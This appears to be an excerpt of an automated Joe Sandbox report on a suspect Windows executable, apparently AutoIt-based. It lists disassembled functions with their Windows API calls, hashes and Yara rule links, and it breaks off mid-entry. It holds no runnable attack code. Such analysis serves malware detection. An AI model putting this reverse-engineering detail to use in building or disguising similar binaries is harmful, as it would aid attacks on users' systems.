                                                                                                            • Instruction ID: cf0296bafb8721ba5351d165345f77e23911ed5f2cea3491ceaad07b131f0baa
                                                                                                            • Opcode Fuzzy Hash: 0f2c94b9dc5f8f822fb3d9632f83ef4dda9e7e84c4a0506c949fd02ecf904f31
                                                                                                            • Instruction Fuzzy Hash: 25415BB5A00289AFDB14EF51D888AAAB7B5FF45754F084219F905AB350D730EE45CF60
                                                                                                            Function 00DB1DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                              • Part of subcall function 00DB3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DB3CCA
                                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00DB1E66
                                                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00DB1E79
                                                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00DB1EA9
                                                                                                              • Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$_wcslen$ClassName
                                                                                                            • String ID: ComboBox$ListBox
                                                                                                            • API String ID: 2081771294-1403004172
                                                                                                            • Opcode ID: 2a6e36152688e76940e9c505aac9d7a305a9bcca544e8ac34b4dd92a53e8acaa
                                                                                                            • Instruction ID: d75c0444df47e4eaa223c3dae392ea993d2f4e8c40ab6f4bce2496d151fd89d2
                                                                                                            • Opcode Fuzzy Hash: 2a6e36152688e76940e9c505aac9d7a305a9bcca544e8ac34b4dd92a53e8acaa
                                                                                                            • Instruction Fuzzy Hash: 9D216675A00244FFDB14ABA4DCA6CFFBBB9EF51350B544119FC26A72E1DB34890A8630
                                                                                                            Function 00DDC9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen
                                                                                                            • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                                                                            • API String ID: 176396367-4004644295
                                                                                                            • Opcode ID: e791cefba02ac07ebaca0fa90bb9007b45380f95d4817ada0e3186af37d845cc
                                                                                                            • Instruction ID: ff57a01ae8541f4f34bfe7b8f70d3dd196f70e86fc3f7519afa863121927df0a
                                                                                                            • Opcode Fuzzy Hash: e791cefba02ac07ebaca0fa90bb9007b45380f95d4817ada0e3186af37d845cc
                                                                                                            • Instruction Fuzzy Hash: B531D572A2016B8BCB20DE6C89515BE37A19BA1750F1D702BEC45AB345FA71CE84D7B0
                                                                                                            Function 00DE2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00DE2F8D
                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 00DE2F94
                                                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00DE2FA9
                                                                                                            • DestroyWindow.USER32(?), ref: 00DE2FB1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                            • String ID: SysAnimate32
                                                                                                            • API String ID: 3529120543-1011021900
                                                                                                            • Opcode ID: a3a9ab88ca4378501acb21d143af1e08df97dcc874560a4b68f2a344ca05e0af
                                                                                                            • Instruction ID: 07c5deed6121d682292ea439807b388ef6cf468c74f8231dd755a9c13141b22e
                                                                                                            • Opcode Fuzzy Hash: a3a9ab88ca4378501acb21d143af1e08df97dcc874560a4b68f2a344ca05e0af
                                                                                                            • Instruction Fuzzy Hash: 2421AC72600285ABEB206F66DC81FBB37BDEF59368F140228FA50D61A0D771DC919770
                                                                                                            Function 00D74D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D74D1E,00D828E9,?,00D74CBE,00D828E9,00E188B8,0000000C,00D74E15,00D828E9,00000002), ref: 00D74D8D
                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D74DA0
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00D74D1E,00D828E9,?,00D74CBE,00D828E9,00E188B8,0000000C,00D74E15,00D828E9,00000002,00000000), ref: 00D74DC3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                            • Opcode ID: e18c5c4fe2d0d3340e84fdb32c090d30426aa49f16b709f4b77d9d755b903472
                                                                                                            • Instruction ID: 9039570f2c502211f6059a67171bb205af8ea0e286ed277d6a14191c853de6e6
                                                                                                            • Opcode Fuzzy Hash: e18c5c4fe2d0d3340e84fdb32c090d30426aa49f16b709f4b77d9d755b903472
                                                                                                            • Instruction Fuzzy Hash: 0AF03134550358AFDB116F90DC49BADBFB5EB44751F054094A90DE6250DB305945CAA0
                                                                                                            Function 00DAD3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32 ref: 00DAD3AD
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00DAD3BF
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00DAD3E5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                            • String ID: GetSystemWow64DirectoryW$X64
                                                                                                            • API String ID: 145871493-2590602151
                                                                                                            • Opcode ID: 877c91f7298e537bbe44e1c2dc0f32a448e56f7f3a58cf77cccb0bdf0fd29497
                                                                                                            • Instruction ID: d61056507635f70b6ae6dff04baf55e26abf05c06857b22863afae0d974ed00d
                                                                                                            • Opcode Fuzzy Hash: 877c91f7298e537bbe44e1c2dc0f32a448e56f7f3a58cf77cccb0bdf0fd29497
                                                                                                            • Instruction Fuzzy Hash: C4F05530801B219BCB306B108C88AA93322BF12B01B59A068F887F6A14DB30CD84C6B6
                                                                                                            Function 00D54E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D54EDD,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54E9C
                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D54EAE
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00D54EDD,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54EC0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                            • API String ID: 145871493-3689287502
                                                                                                            • Opcode ID: 4bf7f72647e4131257da9691a05bb42b544fda1dfd441073e4198e7b52fe7eed
                                                                                                            • Instruction ID: 6f946ef540772b23acff06cfa8bb0e640bb803e44b8f20e4d650c48f8b9aef3c
                                                                                                            • Opcode Fuzzy Hash: 4bf7f72647e4131257da9691a05bb42b544fda1dfd441073e4198e7b52fe7eed
                                                                                                            • Instruction Fuzzy Hash: 40E0CD35E117225FD6312B256C1DB5F6554AF82F677091115FC04E7300DF60CD4741B2
                                                                                                            Function 00D54E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D93CDE,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54E62
                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D54E74
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00D93CDE,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54E87
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                            • API String ID: 145871493-1355242751
                                                                                                            • Opcode ID: 158605af7534828aee45067e7d0b30f56d759c3716f51ee85cd0695ba914f0c3
                                                                                                            • Instruction ID: d8baf82db4176228edd62cff670a4108f22f4569db9d60023d6660e7acdc3d84
                                                                                                            • Opcode Fuzzy Hash: 158605af7534828aee45067e7d0b30f56d759c3716f51ee85cd0695ba914f0c3
                                                                                                            • Instruction Fuzzy Hash: A4D0C231912B615B4A222B256C09D8F2A18AF81F163091114BC15E6210CF20CD4681F1
                                                                                                            Function 00DDA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00DDA427
                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DDA435
                                                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DDA468
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00DDA63D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3488606520-0
                                                                                                            • Opcode ID: a1910af215a85124cee3e4ce7c2aac491bc701644b6bc35e0b02febdb1a454ca
                                                                                                            • Instruction ID: f6c6cee7d903424cd1c513c4718d71ae8f548156b93af0cda2b8f05eeda0fbae
                                                                                                            • Opcode Fuzzy Hash: a1910af215a85124cee3e4ce7c2aac491bc701644b6bc35e0b02febdb1a454ca
                                                                                                            • Instruction Fuzzy Hash: 36A180716043019FD720DF28D886F2AB7E5EF84714F14885DF9999B392DB70EC458BA1
                                                                                                            Function 00DBE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DBDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DBCF22,?), ref: 00DBDDFD
                                                                                                              • Part of subcall function 00DBDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DBCF22,?), ref: 00DBDE16
                                                                                                              • Part of subcall function 00DBE199: GetFileAttributesW.KERNEL32(?,00DBCF95), ref: 00DBE19A
                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00DBE473
                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00DBE4AC
                                                                                                            • _wcslen.LIBCMT ref: 00DBE5EB
                                                                                                            • _wcslen.LIBCMT ref: 00DBE603
                                                                                                            • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00DBE650
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 3183298772-0
                                                                                                            • Opcode ID: 33a18be13e600b0930b5a8debda8b12c45939c64abff7dd29490be2a48898f76
                                                                                                            • Instruction ID: dbfefa96ba78346052540866ffcd4fcf46ec781e1ef1187e2416de45235997a8
                                                                                                            • Opcode Fuzzy Hash: 33a18be13e600b0930b5a8debda8b12c45939c64abff7dd29490be2a48898f76
                                                                                                            • Instruction Fuzzy Hash: EB515FB24083859BC724EBA4D8919DBB3ECEF84340F44491EF68AD3151EF74E5888776
                                                                                                            Function 00DDB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                              • Part of subcall function 00DDC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DDB6AE,?,?), ref: 00DDC9B5
                                                                                                              • Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDC9F1
                                                                                                              • Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDCA68
                                                                                                              • Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDCA9E
                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DDBAA5
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DDBB00
                                                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00DDBB63
                                                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 00DDBBA6
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00DDBBB3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                            • String ID:
                                                                                                            • API String ID: 826366716-0
                                                                                                            • Opcode ID: f5714712120460d05f4561a123f3da6c27749be4e41bc81ab0c9265180b0d6af
                                                                                                            • Instruction ID: 21c4fc118121dc091e695c2e7acd55ac7d213989215627de38e5e9140d629696
                                                                                                            • Opcode Fuzzy Hash: f5714712120460d05f4561a123f3da6c27749be4e41bc81ab0c9265180b0d6af
                                                                                                            • Instruction Fuzzy Hash: A1616D31208241EFD714DF14C490E2ABBE5FF84318F55955EF8998B292DB31ED45CBA2
                                                                                                            Function 00DB8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VariantInit.OLEAUT32(?), ref: 00DB8BCD
                                                                                                            • VariantClear.OLEAUT32 ref: 00DB8C3E
                                                                                                            • VariantClear.OLEAUT32 ref: 00DB8C9D
                                                                                                            • VariantClear.OLEAUT32(?), ref: 00DB8D10
                                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00DB8D3B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$Clear$ChangeInitType
                                                                                                            • String ID:
                                                                                                            • API String ID: 4136290138-0
                                                                                                            • Opcode ID: ee8e631490b1bb29f4b986d176e88ecaa8c1197e296d500400ee865ddea46900
                                                                                                            • Instruction ID: c009b3d3278028af629c8f90fd11c5bb2c2fa37175d5e07f19b3b01eb4de2165
                                                                                                            • Opcode Fuzzy Hash: ee8e631490b1bb29f4b986d176e88ecaa8c1197e296d500400ee865ddea46900
                                                                                                            • Instruction Fuzzy Hash: 37516BB5A00219EFCB10CF58C894AAAB7F8FF89310B15855AE906DB350E730E911CBA0
                                                                                                            Function 00DC8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00DC8BAE
                                                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00DC8BDA
                                                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00DC8C32
                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00DC8C57
                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00DC8C5F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                                                            • String ID:
                                                                                                            • API String ID: 2832842796-0
                                                                                                            • Opcode ID: b0ff13816cf83c3e610933c820c516d58719fcec9b2f41b6f9ef67cb33592ecb
                                                                                                            • Instruction ID: f1db2bc78b01d92dbae96d90ab2f8125f7a10397d5a252c3553d2c4e3133c364
                                                                                                            • Opcode Fuzzy Hash: b0ff13816cf83c3e610933c820c516d58719fcec9b2f41b6f9ef67cb33592ecb
                                                                                                            • Instruction Fuzzy Hash: 68512635A00215AFCB05DF64C881E6ABBF5FF49315F088458E849AB362DB31ED55DBA0
                                                                                                            Function 00DD8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00DD8F40
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00DD8FD0
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00DD8FEC
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00DD9032
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00DD9052
                                                                                                              • Part of subcall function 00D6F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00DC1043,?,753CE610), ref: 00D6F6E6
                                                                                                              • Part of subcall function 00D6F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00DAFA64,00000000,00000000,?,?,00DC1043,?,753CE610,?,00DAFA64), ref: 00D6F70D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 666041331-0
                                                                                                            • Opcode ID: eda27845f8f23c1c6d49004e98120824acbbb0bf60b74dc1d41860c8b32f13ac
                                                                                                            • Instruction ID: 7342e94d726fe5133c44cde2cf6e4ddd017f8b7fea3f7a829624bbb8a1c51ebe
                                                                                                            • Opcode Fuzzy Hash: eda27845f8f23c1c6d49004e98120824acbbb0bf60b74dc1d41860c8b32f13ac
                                                                                                            • Instruction Fuzzy Hash: C5511C35604245DFCB15EF68C4948ADBBF1FF49324B088099EC559B362DB31ED86CBA1
                                                                                                            Function 00DE6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00DE6C33
